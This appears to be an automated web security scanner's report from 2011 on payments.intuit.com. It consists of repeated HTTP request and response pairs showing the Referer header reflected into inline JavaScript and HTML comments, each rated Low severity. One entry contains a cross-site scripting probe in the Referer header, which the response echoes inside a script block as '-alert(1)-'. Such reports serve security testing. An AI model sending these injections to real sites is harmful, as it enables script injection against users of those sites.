GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11266129786 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d9a61c18c39e371e68f X-Glam-Bdata: XGlamBData,nbt,lda,ln X-Glam-AdId: 5000025383 X-Glam-Euid: 3aa0a546ac04a62367c2 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:42:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 16:42:15 GMT Connection: close Content-Length: 10026 ...[SNIP]... 2sa,g10001s;sz=300x250 var vars = glam_affiliate_vars.split for (var i=0;i<vars.length;i++) { var pair = vars[i].split("="); if ( pair[1] ) { glam_info[pair[0]] = pair[1]; } } return ( glam_info[pNa ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | / |
GET / HTTP/1.1 Host: payments.intuit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID Referer: 5deb3%2527%252dalert |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:37 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D938BD4E0A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding P3P: policyref="http:/ Content-Type: text/html;charset=ISO Content-Length: 108420 ...[SNIP]... <script> // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = '5deb3'-alert(1)- </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | / |
GET / HTTP/1.1 Host: payments.intuit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:39 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=4899600000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D938C4260A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding P3P: policyref="http:/ Content-Type: text/html;charset=ISO Content-Length: 108511 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | / |
GET /?launchHelpMeChoose=true HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:55:55 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D958225A0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 108426 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/ |
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:39 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96022AC0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 128360 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/ |
GET /apply-now/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:54 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID= X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9605E300A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 128389 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:19 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D170C0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161385 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/check-warranty |
GET /apply-now/check-warranty Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:01:40 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=wS+X X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95D675E0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 161415 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/contact-me.jsp |
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:31 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=iwPi7b X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C5B0E0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 93324 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /apply-now/contact-me.jsp |
GET /apply-now/contact-me.jsp HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:50 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95CA4950A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 93356 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/ |
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:25 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=M3gX X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95B59C30A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 90447 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/ |
GET /products/ HTTP/1.1 Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:04 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95B06050A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 90415 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:42 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95C84210A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92653 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:00:54 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=ApFXrC X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95CB3320A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Vary: Accept-Encoding P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92685 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:24 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E12360A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 101820 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:02:41 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95E55E90A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 101853 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:11 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=ZLWBpsz X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9609DEA0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 134929 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:24 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960D1CF0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 134961 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:19 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95B41DF0A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92653 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:59:36 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID=WOX X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D95B81750A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 92686 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:06:03 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9616C710A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 151809 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:06:08 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D96180120A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 151842 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:04:57 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D9606A630A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 110754 ...[SNIP]... // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure var testReferDomain="0"; var eVar17Value = 'http://www.google.com </script> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://payments.intuit |
Path: | /products/basic-payment |
GET /products/basic-payment Host: payments.intuit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID Referer: http://www.google.com |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 17:05:13 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA Set-Cookie: INTUIT_SESSIONID X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=payments.intuit Set-Cookie: Sgmt=default; Domain=payments.intuit x-wily-info: Clear guid=D960A7C00A08051 x-wily-servlet: Clear appServerIp= Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref="http:/ Connection: close Content-Type: text/html;charset=ISO Content-Length: 110789 ...[SNIP]... <!--http://www.google.com ...[SNIP]... |
Severity: | Low |
